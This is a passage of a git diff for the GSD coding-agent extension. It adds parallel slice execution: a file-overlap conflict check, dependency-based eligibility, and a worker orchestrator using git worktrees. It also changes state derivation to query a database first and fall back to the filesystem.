+  const all = new Set([...names, ...claudeNames, ...legacyNames]);
+  availableSkills = [...all];
   activelyLoadedSkills.clear();
 }
 
@@ -99,8 +107,13 @@ export function detectStaleSkills(
   const stale: string[] = [];
 
   // Check all installed skills, not just those with usage data
-  const skillsDir = join(getAgentDir(), "skills");
-  const installed = listSkillNames(skillsDir);
+  const skillsDir = join(homedir(), ".agents", "skills");
+  const claudeSkillsDir = join(homedir(), ".claude", "skills");
+  const legacyDir = join(homedir(), ".gsd", "agent", "skills");
+  const legacyMigrated = existsSync(join(legacyDir, ".migrated-to-agents"));
+  const legacyNames = legacyMigrated ? [] : listSkillNames(legacyDir);
+  const installedSet = new Set([...listSkillNames(skillsDir), ...listSkillNames(claudeSkillsDir), ...legacyNames]);
+  const installed = [...installedSet];
 
   for (const skill of installed) {
     const lastTs = lastUsed.get(skill);
diff --git a/src/resources/extensions/gsd/slice-parallel-conflict.ts b/src/resources/extensions/gsd/slice-parallel-conflict.ts
new file mode 100644
index 000000000..dd540a627
--- /dev/null
+++ b/src/resources/extensions/gsd/slice-parallel-conflict.ts
@@ -0,0 +1,86 @@
+/**
+ * GSD Slice Parallel Conflict Detection — File overlap analysis between slices.
+ *
+ * Reads PLAN.md for each slice and extracts file paths mentioned in task
+ * descriptions. If two slices share more than 5 file paths, they are considered
+ * conflicting and should not run in parallel.
+ *
+ * Conservative by default: missing PLAN = block parallel execution.
+ */
+
+import { existsSync, readFileSync } from "node:fs";
+import { join } from "node:path";
+
+// ─── File Path Extraction ─────────────────────────────────────────────────────
+
+/**
+ * Extract file paths from a PLAN.md content string.
+ * Matches common patterns like `src/...`, `lib/...`, paths with extensions.
+ */
+function extractFilePaths(content: string): Set<string> {
+  const paths = new Set<string>();
+
+  // Match file-like patterns: word/word paths with extensions, or src/lib/etc prefixed paths
+  const patterns = [
+    // Paths like src/foo/bar.ts, lib/utils.js, etc.
+    /(?:src|lib|test|tests|app|pkg|cmd|internal|components|pages|api|utils|config|scripts|dist|build)\/[\w./-]+\.\w+/g,
+    // Generic path with at least one slash and extension
+    /(?<!\w)[\w-]+\/[\w./-]+\.\w{1,5}(?!\w)/g,
+  ];
+
+  for (const pattern of patterns) {
+    const matches = content.matchAll(pattern);
+    for (const match of matches) {
+      paths.add(match[0]);
+    }
+  }
+
+  return paths;
+}
+
+// ─── Conflict Detection ──────────────────────────────────────────────────────
+
+/**
+ * Check if two slices have file conflicts that would block parallel execution.
+ *
+ * @param basePath  Project root path.
+ * @param mid       Milestone ID.
+ * @param sliceA    First slice ID.
+ * @param sliceB    Second slice ID.
+ * @returns         true if parallel is unsafe (>5 shared files or missing plan).
+ */
+export function hasFileConflict(
+  basePath: string,
+  mid: string,
+  sliceA: string,
+  sliceB: string,
+): boolean {
+  const planPathA = join(basePath, ".gsd", "milestones", mid, sliceA, "PLAN.md");
+  const planPathB = join(basePath, ".gsd", "milestones", mid, sliceB, "PLAN.md");
+
+  // Conservative: missing PLAN = block
+  if (!existsSync(planPathA) || !existsSync(planPathB)) {
+    return true;
+  }
+
+  const contentA = readFileSync(planPathA, "utf-8");
+  const contentB = readFileSync(planPathB, "utf-8");
+
+  const filesA = extractFilePaths(contentA);
+  const filesB = extractFilePaths(contentB);
+
+  // If either has no files extracted, no conflict detectable → allow
+  if (filesA.size === 0 || filesB.size === 0) {
+    return false;
+  }
+
+  // Count shared files
+  let sharedCount = 0;
+  for (const file of filesA) {
+    if (filesB.has(file)) {
+      sharedCount++;
+    }
+  }
+
+  return sharedCount > 5;
+}
diff --git a/src/resources/extensions/gsd/slice-parallel-eligibility.ts b/src/resources/extensions/gsd/slice-parallel-eligibility.ts
new file mode 100644
index 000000000..f00fa0f43
--- /dev/null
+++ b/src/resources/extensions/gsd/slice-parallel-eligibility.ts
@@ -0,0 +1,73 @@
+/**
+ * GSD Slice Parallel Eligibility — Pure function to determine which slices
+ * within a milestone can run in parallel based on dependency satisfaction.
+ *
+ * This is the slice-level equivalent of parallel-eligibility.ts (which operates
+ * at milestone scope). The key difference is the positional fallback: slices
+ * without explicit dependencies use sequential ordering as an implicit constraint.
+ */
+
+// ─── Types ────────────────────────────────────────────────────────────────────
+
+export interface SliceInput {
+  id: string;
+  done: boolean;
+  depends: string[];
+}
+
+export interface EligibleSlice {
+  id: string;
+}
+
+// ─── Core Logic ───────────────────────────────────────────────────────────────
+
+/**
+ * Determine which slices are eligible for parallel execution.
+ *
+ * Rules:
+ * 1. Done slices are never eligible (nothing to do).
+ * 2. A slice with explicit `depends` entries is eligible when ALL deps
+ *    appear in `completedSliceIds`.
+ * 3. A slice with NO `depends` entries uses positional fallback: it is
+ *    eligible only when every positionally-earlier slice is done.
+ *    This preserves backward compatibility with roadmaps that don't
+ *    declare inter-slice dependencies.
+ *
+ * @param slices      All slices in the milestone (ordered by position).
+ * @param completedSliceIds  Set of slice IDs that are already complete.
+ * @returns           Array of eligible slice descriptors.
+ */
+export function getEligibleSlices(
+  slices: SliceInput[],
+  completedSliceIds: Set<string>,
+): EligibleSlice[] {
+  const eligible: EligibleSlice[] = [];
+
+  for (let i = 0; i < slices.length; i++) {
+    const slice = slices[i];
+
+    // Rule 1: skip done slices
+    if (slice.done) continue;
+
+    const hasExplicitDeps = slice.depends.length > 0;
+
+    if (hasExplicitDeps) {
+      // Rule 2: explicit dependencies — all must be satisfied
+      const allDepsSatisfied = slice.depends.every(dep => completedSliceIds.has(dep));
+      if (allDepsSatisfied) {
+        eligible.push({ id: slice.id });
+      }
+    } else {
+      // Rule 3: no deps declared — positional fallback
+      // Eligible only if all positionally-earlier slices are done
+      const allEarlierDone = slices.slice(0, i).every(
+        earlier => earlier.done || completedSliceIds.has(earlier.id),
+      );
+      if (allEarlierDone) {
+        eligible.push({ id: slice.id });
+      }
+    }
+  }
+
+  return eligible;
+}
diff --git a/src/resources/extensions/gsd/slice-parallel-orchestrator.ts b/src/resources/extensions/gsd/slice-parallel-orchestrator.ts
new file mode 100644
index 000000000..346237651
--- /dev/null
+++ b/src/resources/extensions/gsd/slice-parallel-orchestrator.ts
@@ -0,0 +1,477 @@
+/**
+ * GSD Slice Parallel Orchestrator — Engine for parallel slice execution
+ * within a single milestone.
+ *
+ * Mirrors the existing parallel-orchestrator.ts pattern at slice scope
+ * instead of milestone scope. Workers are separate processes spawned via
+ * child_process, each running in its own git worktree with GSD_SLICE_LOCK
+ * + GSD_MILESTONE_LOCK env vars set.
+ *
+ * Key differences from milestone-level parallelism:
+ * - Scope: slices within one milestone, not milestones within a project
+ * - Lock env: GSD_SLICE_LOCK (in addition to GSD_MILESTONE_LOCK)
+ * - Conflict check: file overlap between slice plans (slice-parallel-conflict.ts)
+ */
+
+import { spawn, type ChildProcess } from "node:child_process";
+import {
+  appendFileSync,
+  existsSync,
+  writeFileSync,
+  readFileSync,
+  mkdirSync,
+} from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+import { gsdRoot } from "./paths.js";
+import { createWorktree, worktreePath, removeWorktree } from "./worktree-manager.js";
+import { autoWorktreeBranch, runWorktreePostCreateHook } from "./auto-worktree.js";
+import {
+  writeSessionStatus,
+  removeSessionStatus,
+} from "./session-status-io.js";
+import { hasFileConflict } from "./slice-parallel-conflict.js";
+import { getErrorMessage } from "./error-utils.js";
+
+// ─── Types ─────────────────────────────────────────────────────────────────
+
+export interface SliceWorkerInfo {
+  milestoneId: string;
+  sliceId: string;
+  pid: number;
+  process: ChildProcess | null;
+  worktreePath: string;
+  startedAt: number;
+  state: "running" | "stopped" | "error";
+  completedUnits: number;
+  cost: number;
+  cleanup?: () => void;
+}
+
+export interface SliceOrchestratorState {
+  active: boolean;
+  workers: Map<string, SliceWorkerInfo>;
+  totalCost: number;
+  budgetCeiling?: number;
+  maxWorkers: number;
+  startedAt: number;
+  basePath: string;
+}
+
+export interface StartSliceParallelOpts {
+  maxWorkers?: number;
+  budgetCeiling?: number;
+}
+
+// ─── Module State ──────────────────────────────────────────────────────────
+
+let sliceState: SliceOrchestratorState | null = null;
+
+// ─── Public API ────────────────────────────────────────────────────────────
+
+/**
+ * Check whether slice-level parallel is currently active.
+ */
+export function isSliceParallelActive(): boolean {
+  return sliceState?.active === true;
+}
+
+/**
+ * Get current slice orchestrator state (read-only snapshot).
+ */
+export function getSliceOrchestratorState(): SliceOrchestratorState | null {
+  return sliceState;
+}
+
+/**
+ * Start parallel execution for eligible slices within a milestone.
+ *
+ * For each eligible slice: create a worktree, spawn `gsd --mode json --print "/gsd auto"`
+ * with env GSD_SLICE_LOCK=<SID> + GSD_MILESTONE_LOCK=<MID> + GSD_PARALLEL_WORKER=1.
+ */
+export async function startSliceParallel(
+  basePath: string,
+  milestoneId: string,
+  eligibleSlices: Array<{ id: string }>,
+  opts: StartSliceParallelOpts = {},
+): Promise<{ started: string[]; errors: Array<{ sid: string; error: string }> }> {
+  // Prevent nesting: if already a parallel worker, refuse
+  if (process.env.GSD_PARALLEL_WORKER) {
+    return { started: [], errors: [{ sid: "all", error: "Cannot start slice-parallel from within a parallel worker" }] };
+  }
+
+  const maxWorkers = opts.maxWorkers ?? 2;
+  const budgetCeiling = opts.budgetCeiling;
+
+  // Initialize orchestrator state
+  sliceState = {
+    active: true,
+    workers: new Map(),
+    totalCost: 0,
+    budgetCeiling,
+    maxWorkers,
+    startedAt: Date.now(),
+    basePath,
+  };
+
+  const started: string[] = [];
+  const errors: Array<{ sid: string; error: string }> = [];
+
+  // Filter out conflicting slices (conservative: check all pairs)
+  const safeSlices = filterConflictingSlices(basePath, milestoneId, eligibleSlices);
+
+  // Limit to maxWorkers
+  const toSpawn = safeSlices.slice(0, maxWorkers);
+
+  for (const slice of toSpawn) {
+    try {
+      // Create worktree for this slice
+      const wtBranch = `slice/${milestoneId}/${slice.id}`;
+      const wtName = `${milestoneId}-${slice.id}`;
+      const wtPath = worktreePath(basePath, wtName);
+
+      if (!existsSync(wtPath)) {
+        createWorktree(basePath, wtName, { branch: wtBranch });
+      }
+
+      // Create worker info
+      const worker: SliceWorkerInfo = {
+        milestoneId,
+        sliceId: slice.id,
+        pid: 0,
+        process: null,
+        worktreePath: wtPath,
+        startedAt: Date.now(),
+        state: "running",
+        completedUnits: 0,
+        cost: 0,
+      };
+
+      sliceState.workers.set(slice.id, worker);
+
+      // Spawn worker
+      const spawned = spawnSliceWorker(basePath, milestoneId, slice.id);
+      if (spawned) {
+        started.push(slice.id);
+      } else {
+        errors.push({ sid: slice.id, error: "Failed to spawn worker process" });
+        worker.state = "error";
+      }
+    } catch (err) {
+      errors.push({ sid: slice.id, error: getErrorMessage(err) });
+      // Best-effort cleanup of partially created worktree
+      const wtName = `${milestoneId}-${slice.id}`;
+      try {
+        removeWorktree(basePath, wtName, { deleteBranch: true, force: true });
+      } catch { /* ignore cleanup failures */ }
+    }
+  }
+
+  // If nothing started, deactivate
+  if (started.length === 0) {
+    sliceState.active = false;
+  }
+
+  return { started, errors };
+}
+
+/**
+ * Stop all slice-parallel workers and deactivate.
+ */
+export function stopSliceParallel(): void {
+  if (!sliceState) return;
+
+  for (const worker of sliceState.workers.values()) {
+    if (worker.process) {
+      try {
+        worker.process.kill("SIGTERM");
+      } catch { /* already dead */ }
+    }
+    worker.cleanup?.();
+    worker.cleanup = undefined;
+    worker.process = null;
+    worker.state = "stopped";
+
+    // Clean up worktree created for this worker
+    const wtName = `${worker.milestoneId}-${worker.sliceId}`;
+    try {
+      removeWorktree(sliceState.basePath, wtName, { deleteBranch: true, force: true });
+    } catch { /* best-effort cleanup */ }
+  }
+
+  sliceState.active = false;
+}
+
+/**
+ * Get aggregate cost across all slice workers.
+ */
+export function getSliceAggregateCost(): number {
+  if (!sliceState) return 0;
+  let total = 0;
+  for (const w of sliceState.workers.values()) {
+    total += w.cost;
+  }
+  return total;
+}
+
+/**
+ * Check if budget ceiling has been exceeded.
+ */
+export function isSliceBudgetExceeded(): boolean {
+  if (!sliceState?.budgetCeiling) return false;
+  return getSliceAggregateCost() >= sliceState.budgetCeiling;
+}
+
+/**
+ * Reset module state (for testing).
+ */
+export function resetSliceOrchestrator(): void {
+  if (sliceState) {
+    for (const w of sliceState.workers.values()) {
+      w.cleanup?.();
+    }
+  }
+  sliceState = null;
+}
+
+// ─── Internal: Conflict Filtering ──────────────────────────────────────────
+
+/**
+ * Remove slices that have file conflicts with each other.
+ * Greedy: add slices to the safe set in order; skip any that conflict
+ * with an already-included slice.
+ */
+function filterConflictingSlices(
+  basePath: string,
+  milestoneId: string,
+  slices: Array<{ id: string }>,
+): Array<{ id: string }> {
+  const safe: Array<{ id: string }> = [];
+
+  for (const candidate of slices) {
+    let conflictsWithSafe = false;
+    for (const existing of safe) {
+      if (hasFileConflict(basePath, milestoneId, candidate.id, existing.id)) {
+        conflictsWithSafe = true;
+        break;
+      }
+    }
+    if (!conflictsWithSafe) {
+      safe.push(candidate);
+    }
+  }
+
+  return safe;
+}
+
+// ─── Internal: Worker Spawning ─────────────────────────────────────────────
+
+/**
+ * Resolve the GSD CLI binary path.
+ * Same logic as parallel-orchestrator.ts resolveGsdBin().
+ */
+function resolveGsdBin(): string | null {
+  if (process.env.GSD_BIN_PATH && existsSync(process.env.GSD_BIN_PATH)) {
+    return process.env.GSD_BIN_PATH;
+  }
+
+  let thisDir: string;
+  try {
+    thisDir = dirname(fileURLToPath(import.meta.url));
+  } catch {
+    thisDir = process.cwd();
+  }
+  const candidates = [
+    join(thisDir, "..", "..", "..", "loader.js"),
+    join(thisDir, "..", "..", "..", "..", "dist", "loader.js"),
+  ];
+  for (const candidate of candidates) {
+    if (existsSync(candidate)) return candidate;
+  }
+
+  return null;
+}
+
+/**
+ * Spawn a worker process for a slice.
+ * The worker runs `gsd --mode json --print "/gsd auto"` in the slice's worktree
+ * with GSD_SLICE_LOCK, GSD_MILESTONE_LOCK, and GSD_PARALLEL_WORKER set.
+ */
+function spawnSliceWorker(
+  basePath: string,
+  milestoneId: string,
+  sliceId: string,
+): boolean {
+  if (!sliceState) return false;
+  const worker = sliceState.workers.get(sliceId);
+  if (!worker) return false;
+  if (worker.process) return true;
+
+  const binPath = resolveGsdBin();
+  if (!binPath) return false;
+
+  let child: ChildProcess;
+  try {
+    child = spawn(process.execPath, [binPath, "--mode", "json", "--print", "/gsd auto"], {
+      cwd: worker.worktreePath,
+      env: {
+        ...process.env,
+        GSD_SLICE_LOCK: sliceId,
+        GSD_MILESTONE_LOCK: milestoneId,
+        GSD_PROJECT_ROOT: basePath,
+        GSD_PARALLEL_WORKER: "1",
+      },
+      stdio: ["ignore", "pipe", "pipe"],
+      detached: false,
+    });
+  } catch {
+    return false;
+  }
+
+  child.on("error", () => {
+    if (!sliceState) return;
+    const w = sliceState.workers.get(sliceId);
+    if (w) {
+      w.process = null;
+    }
+  });
+
+  worker.process = child;
+  worker.pid = child.pid ?? 0;
+
+  if (!child.pid) {
+    worker.process = null;
+    return false;
+  }
+
+  // ── NDJSON stdout monitoring ────────────────────────────────────────
+  if (child.stdout) {
+    let stdoutBuffer = "";
+    child.stdout.on("data", (data: Buffer) => {
+      stdoutBuffer += data.toString();
+      const lines = stdoutBuffer.split("\n");
+      stdoutBuffer = lines.pop() || "";
+      for (const line of lines) {
+        processSliceWorkerLine(basePath, milestoneId, sliceId, line);
+      }
+    });
+    child.stdout.on("close", () => {
+      if (stdoutBuffer.trim()) {
+        processSliceWorkerLine(basePath, milestoneId, sliceId, stdoutBuffer);
+      }
+    });
+  }
+
+  if (child.stderr) {
+    child.stderr.on("data", (data: Buffer) => {
+      appendSliceWorkerLog(basePath, milestoneId, sliceId, data.toString());
+    });
+  }
+
+  // Update session status
+  writeSessionStatus(basePath, {
+    milestoneId: `${milestoneId}/${sliceId}`,
+    pid: worker.pid,
+    state: "running",
+    currentUnit: null,
+    completedUnits: worker.completedUnits,
+    cost: worker.cost,
+    lastHeartbeat: Date.now(),
+    startedAt: worker.startedAt,
+    worktreePath: worker.worktreePath,
+  });
+
+  // Store cleanup function
+  worker.cleanup = () => {
+    child.stdout?.removeAllListeners();
+    child.stderr?.removeAllListeners();
+    child.removeAllListeners();
+  };
+
+  // Handle worker exit
+  child.on("exit", (code) => {
+    if (!sliceState) return;
+    const w = sliceState.workers.get(sliceId);
+    if (!w) return;
+
+    w.cleanup?.();
+    w.cleanup = undefined;
+    w.process = null;
+
+    if (w.state === "stopped") return;
+
+    if (code === 0) {
+      w.state = "stopped";
+    } else {
+      w.state = "error";
+      appendSliceWorkerLog(basePath, milestoneId, sliceId,
+        `\n[slice-orchestrator] worker exited with code ${code ?? "null"}\n`);
+    }
+
+    writeSessionStatus(basePath, {
+      milestoneId: `${milestoneId}/${sliceId}`,
+      pid: w.pid,
+      state: w.state,
+      currentUnit: null,
+      completedUnits: w.completedUnits,
+      cost: w.cost,
+      lastHeartbeat: Date.now(),
+      startedAt: w.startedAt,
+      worktreePath: w.worktreePath,
+    });
+  });
+
+  return true;
+}
+
+// ─── NDJSON Processing ──────────────────────────────────────────────────────
+
+/**
+ * Process a single NDJSON line from a slice worker's stdout.
+ * Extracts cost from message_end events.
+ */
+function processSliceWorkerLine(
+  _basePath: string,
+  _milestoneId: string,
+  sliceId: string,
+  line: string,
+): void {
+  if (!line.trim() || !sliceState) return;
+
+  let event: Record<string, unknown>;
+  try {
+    event = JSON.parse(line);
+  } catch {
+    return;
+  }
+
+  const type = String(event.type ?? "");
+  if (type === "message_end") {
+    const worker = sliceState.workers.get(sliceId);
+    if (worker) {
+      const usage = event.usage as Record<string, unknown> | undefined;
+      if (usage?.cost && typeof usage.cost === "number") {
+        worker.cost += usage.cost;
+        sliceState.totalCost += usage.cost;
+      }
+      worker.completedUnits++;
+    }
+  }
+}
+
+// ─── Logging ────────────────────────────────────────────────────────────────
+
+function sliceLogDir(basePath: string): string {
+  return join(gsdRoot(basePath), "parallel", "slice-logs");
+}
+
+function appendSliceWorkerLog(
+  basePath: string,
+  milestoneId: string,
+  sliceId: string,
+  text: string,
+): void {
+  const dir = sliceLogDir(basePath);
+  mkdirSync(dir, { recursive: true });
+  appendFileSync(join(dir, `${milestoneId}-${sliceId}.log`), text);
+}
diff --git a/src/resources/extensions/gsd/state.ts b/src/resources/extensions/gsd/state.ts
index 285c4a898..f6170522b 100644
--- a/src/resources/extensions/gsd/state.ts
+++ b/src/resources/extensions/gsd/state.ts
@@ -1,5 +1,5 @@
 // GSD Extension — State Derivation
-// Reads roadmap + plan files to determine current position.
+// DB-primary state derivation with filesystem fallback for unmigrated projects.
 // Pure TypeScript, zero Pi dependencies.
 
 import type {
@@ -14,6 +14,9 @@ import type {
 import {
   parseRoadmap,
   parsePlan,
+} from './parsers-legacy.js';
+
+import {
   parseSummary,
   loadFile,
   parseRequirementCounts,
@@ -31,20 +34,73 @@ import {
   gsdRoot,
 } from './paths.js';
 
-import { milestoneIdSort, findMilestoneIds } from './milestone-ids.js';
+import { findMilestoneIds } from './milestone-ids.js';
+import { loadQueueOrder, sortByQueueOrder } from './queue-order.js';
+import { isClosedStatus, isDeferredStatus } from './status-guards.js';
 import { nativeBatchParseGsdFiles, type BatchParsedFile } from './native-parser-bridge.js';
 
 import { join, resolve } from 'path';
-import { existsSync, readdirSync } from 'node:fs';
+import { existsSync, readdirSync, readFileSync } from 'node:fs';
 import { debugCount, debugTime } from './debug-logger.js';
+import { logWarning, logError } from './workflow-logger.js';
+import { extractVerdict } from './verdict-parser.js';
+
+import {
+  isDbAvailable,
+  getAllMilestones,
+  getMilestone,
+  getMilestoneSlices,
+  getSliceTasks,
+  getReplanHistory,
+  getSlice,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  updateTaskStatus,
+  getPendingSliceGateCount,
+  type MilestoneRow,
+  type SliceRow,
+  type TaskRow,
+} from './gsd-db.js';
 
 /**
  * A "ghost" milestone directory contains only META.json (and no substantive
  * files like CONTEXT, CONTEXT-DRAFT, ROADMAP, or SUMMARY).  These appear when
  * a milestone is created but never initialised.  Treating them as active causes
  * auto-mode to stall or falsely declare completion.
+ *
+ * However, a milestone is NOT a ghost if:
+ * - It has a DB row with a meaningful status (queued, active, etc.) — the DB
+ *   knows about it even if content files haven't been created yet.
+ * - It has a worktree directory — a worktree proves the milestone was
+ *   legitimately created and is expected to be populated.
+ *
+ * Fixes #2921: queued milestones with worktrees were incorrectly classified
+ * as ghosts, causing auto-mode to skip them entirely.
  */
 export function isGhostMilestone(basePath: string, mid: string): boolean {
+  // If the milestone has a DB row, it's usually a known milestone — not a ghost.
+  // Exception: a "queued" row with no disk artifacts is a phantom from
+  // gsd_milestone_generate_id that was never planned (#3645).
+  if (isDbAvailable()) {
+    const dbRow = getMilestone(mid);
+    if (dbRow) {
+      if (dbRow.status === 'queued') {
+        const hasContent = resolveMilestoneFile(basePath, mid, "CONTEXT")
+          || resolveMilestoneFile(basePath, mid, "ROADMAP")
+          || resolveMilestoneFile(basePath, mid, "SUMMARY");
+        return !hasContent;
+      }
+      return false;
+    }
+  }
+
+  // If a worktree exists for this milestone, it was legitimately created.
+  const root = gsdRoot(basePath);
+  const wtPath = join(root, 'worktrees', mid);
+  if (existsSync(wtPath)) return false;
+
+  // Fall back to content-file check: no substantive files means ghost.
   const context   = resolveMilestoneFile(basePath, mid, "CONTEXT");
   const draft     = resolveMilestoneFile(basePath, mid, "CONTEXT-DRAFT");
   const roadmap   = resolveMilestoneFile(basePath, mid, "ROADMAP");
@@ -69,21 +125,13 @@ export function isMilestoneComplete(roadmap: Roadmap): boolean {
 }
 
 /**
- * Check whether a VALIDATION file's verdict is terminal (pass or needs-attention).
- * A non-terminal verdict (needs-remediation) means validation must re-run
- * after remediation slices are executed.
+ * Check whether a VALIDATION file's verdict is terminal.
+ * Any successfully extracted verdict (pass, needs-attention, needs-remediation,
+ * fail, etc.) means validation completed. Only return false when no verdict
+ * could be parsed — i.e. extractVerdict() returns undefined (#2769).
  */
 export function isValidationTerminal(validationContent: string): boolean {
-  const match = validationContent.match(/^---\n([\s\S]*?)\n---/);
-  if (!match) return false;
-  const verdict = match[1].match(/verdict:\s*(\S+)/);
-  if (!verdict) return false;
-  const v = verdict[1] === 'passed' ? 'pass' : verdict[1];
-  // 'pass' and 'needs-attention' are always terminal.
-  // 'needs-remediation' is treated as terminal to prevent infinite loops
-  // when no remediation slices exist in the roadmap (#832). The validation
-  // report is preserved on disk for manual review.
-  return v === 'pass' || v === 'needs-attention' || v === 'needs-remediation';
+  return extractVerdict(validationContent) != null;
 }
 
 // ─── State Derivation ──────────────────────────────────────────────────────
@@ -102,6 +150,11 @@ interface StateCache {
 const CACHE_TTL_MS = 100;
 let _stateCache: StateCache | null = null;
 
+// ── Telemetry counters for derive-path observability ────────────────────────
+let _telemetry = { dbDeriveCount: 0, markdownDeriveCount: 0 };
+export function getDeriveTelemetry() { return { ..._telemetry }; }
+export function resetDeriveTelemetry() { _telemetry = { dbDeriveCount: 0, markdownDeriveCount: 0 }; }
+
 /**
  * Invalidate the deriveState() cache. Call this whenever planning files on disk
  * may have changed (unit completion, merges, file writes).
@@ -114,36 +167,51 @@ export function invalidateStateCache(): void {
  * Returns the ID of the first incomplete milestone, or null if all are complete.
  */
 export async function getActiveMilestoneId(basePath: string): Promise<string | null> {
-  const milestoneIds = findMilestoneIds(basePath);
   // Parallel worker isolation
   const milestoneLock = process.env.GSD_MILESTONE_LOCK;
   if (milestoneLock) {
+    const milestoneIds = findMilestoneIds(basePath);
     if (!milestoneIds.includes(milestoneLock)) return null;
-    // Locked milestone that is parked should not be active
     const lockedParked = resolveMilestoneFile(basePath, milestoneLock, "PARKED");
     if (lockedParked) return null;
     return milestoneLock;
   }
+
+  // DB-first: query milestones table for the first non-complete, non-parked milestone
+  if (isDbAvailable()) {
+    const allMilestones = getAllMilestones();
+    if (allMilestones.length > 0) {
+      // Respect queue-order.json so /gsd queue reordering is honored (#2556).
+      // Without this, the DB path uses lexicographic sort while the dispatch
+      // guard uses queue order — causing a deadlock.
+      const customOrder = loadQueueOrder(basePath);
+      const sortedIds = sortByQueueOrder(allMilestones.map(m => m.id), customOrder);
+      const byId = new Map(allMilestones.map(m => [m.id, m]));
+      for (const id of sortedIds) {
+        const m = byId.get(id)!;
+        if (isClosedStatus(m.status) || m.status === "parked") continue;
+        return m.id;
+      }
+      return null;
+    }
+  }
+
+  // Filesystem fallback for unmigrated projects or empty DB
+  const milestoneIds = findMilestoneIds(basePath);
   for (const mid of milestoneIds) {
-    // Skip parked milestones — they are not eligible for active status
     const parkedFile = resolveMilestoneFile(basePath, mid, "PARKED");
     if (parkedFile) continue;
 
     const roadmapFile = resolveMilestoneFile(basePath, mid, "ROADMAP");
     const content = roadmapFile ? await loadFile(roadmapFile) : null;
     if (!content) {
-      // No roadmap — but if a summary exists, the milestone is already complete
       const summaryFile = resolveMilestoneFile(basePath, mid, "SUMMARY");
-      if (summaryFile) continue; // completed milestone, skip
-      if (isGhostMilestone(basePath, mid)) continue; // ghost dir — skip
-      return mid; // No roadmap and no summary — milestone is incomplete
-      // Note: draft-awareness (CONTEXT-DRAFT.md) is handled in deriveState(), not here.
-      // A draft milestone is still "active" — this function only determines which milestone is current.
+      if (summaryFile) continue;
+      if (isGhostMilestone(basePath, mid)) continue;
+      return mid;
     }
     const roadmap = parseRoadmap(content);
     if (!isMilestoneComplete(roadmap)) {
-      // Summary is the terminal artifact — if it exists, the milestone is
-      // complete even when roadmap checkboxes weren't ticked (#864).
       const summaryFile = resolveMilestoneFile(basePath, mid, "SUMMARY");
       if (!summaryFile) return mid;
     }
@@ -152,13 +220,12 @@ export async function getActiveMilestoneId(basePath: string): Promise<string | n
 }
 
 /**
- * Reconstruct GSD state from files on disk.
- * This is the source of truth — STATE.md is just a cache of this output.
+ * Reconstruct GSD state from DB (primary) or filesystem (fallback).
+ * STATE.md is a rendered cache of this output.
  *
- * Uses native batch parsing when available: a single Rust call reads and parses
- * every .md file under .gsd/, populating an in-memory cache that replaces all
- * individual loadFile() calls during milestone/slice/task traversal.
- * Falls back to sequential JS file reads when the native module is absent.
+ * When DB is available, queries milestone/slice/task tables directly.
+ * Falls back to filesystem parsing for unmigrated projects or when DB
+ * has zero milestones (e.g. first run before migration).
  */
 export async function deriveState(basePath: string): Promise<GSDState> {
   // Return cached result if within the TTL window for the same basePath
@@ -171,7 +238,44 @@ export async function deriveState(basePath: string): Promise<GSDState> {
   }
 
   const stopTimer = debugTime("derive-state-impl");
-  const result = await _deriveStateImpl(basePath);
+  let result: GSDState;
+
+  // Dual-path: try DB-backed derivation first when hierarchy tables are populated
+  if (isDbAvailable()) {
+    let dbMilestones = getAllMilestones();
+
+    // Disk→DB reconciliation when DB is empty but disk has milestones (#2631).
+    // deriveStateFromDb() does its own reconciliation, but deriveState() skips
+    // it entirely when the DB is empty. Sync here so the DB path is used when
+    // disk milestones exist but haven't been migrated yet.
+    if (dbMilestones.length === 0) {
+      const diskIds = findMilestoneIds(basePath);
+      let synced = false;
+      for (const diskId of diskIds) {
+        if (!isGhostMilestone(basePath, diskId)) {
+          insertMilestone({ id: diskId, status: 'active' });
+          synced = true;
+        }
+      }
+      if (synced) dbMilestones = getAllMilestones();
+    }
+
+    if (dbMilestones.length > 0) {
+      const stopDbTimer = debugTime("derive-state-db");
+      result = await deriveStateFromDb(basePath);
+      stopDbTimer({ phase: result.phase, milestone: result.activeMilestone?.id });
+      _telemetry.dbDeriveCount++;
+    } else {
+      // DB open but no milestones on disk either — use filesystem path
+      result = await _deriveStateImpl(basePath);
+      _telemetry.markdownDeriveCount++;
+    }
+  } else {
+    logWarning("state", "DB unavailable — using filesystem state derivation (degraded mode)");
+    result = await _deriveStateImpl(basePath);
+    _telemetry.markdownDeriveCount++;
+  }
+
   stopTimer({ phase: result.phase, milestone: result.activeMilestone?.id });
   debugCount("deriveStateCalls");
   _stateCache = { basePath, result, timestamp: Date.now() };
@@ -182,15 +286,713 @@ export async function deriveState(basePath: string): Promise<GSDState> {
  * Extract milestone title from CONTEXT.md or CONTEXT-DRAFT.md heading.
  * Falls back to the provided fallback (usually the milestone ID).
  */
+/**
+ * Strip the "M001: " prefix from a milestone title to get the human-readable name.
+ * Used by both DB and filesystem paths for consistency.
+ */
+function stripMilestonePrefix(title: string): string {
+  return title.replace(/^M\d+(?:-[a-z0-9]{6})?[^:]*:\s*/, '') || title;
+}
+
 function extractContextTitle(content: string | null, fallback: string): string {
   if (!content) return fallback;
   const h1 = content.split('\n').find(line => line.startsWith('# '));
   if (!h1) return fallback;
   // Extract title from "# M005: Platform Foundation & Separation" format
-  return h1.slice(2).trim().replace(/^M\d+(?:-[a-z0-9]{6})?[^:]*:\s*/, '') || fallback;
+  return stripMilestonePrefix(h1.slice(2).trim()) || fallback;
 }
 
-async function _deriveStateImpl(basePath: string): Promise<GSDState> {
+// ─── DB-backed State Derivation ────────────────────────────────────────────
+
+// isStatusDone replaced by isClosedStatus from status-guards.ts (single source of truth).
+// Alias kept for backward compatibility within this file.
+const isStatusDone = isClosedStatus;
+
+/**
+ * Derive GSD state from the milestones/slices/tasks DB tables.
+ * Flag files (PARKED, VALIDATION, CONTINUE, REPLAN, REPLAN-TRIGGER, CONTEXT-DRAFT)
+ * are still checked on the filesystem since they aren't in DB tables.
+ * Requirements also stay file-based via parseRequirementCounts().
+ *
+ * Must produce field-identical GSDState to _deriveStateImpl() for the same project.
+ */
+export async function deriveStateFromDb(basePath: string): Promise<GSDState> {
+  const requirements = parseRequirementCounts(await loadFile(resolveGsdRootFile(basePath, "REQUIREMENTS")));
+
+  let allMilestones = getAllMilestones();
+
+  // Incremental disk→DB sync: milestone directories created outside the DB
+  // write path (via /gsd queue, manual mkdir, or complete-milestone writing the
+  // next CONTEXT.md) are never inserted by the initial migration guard in
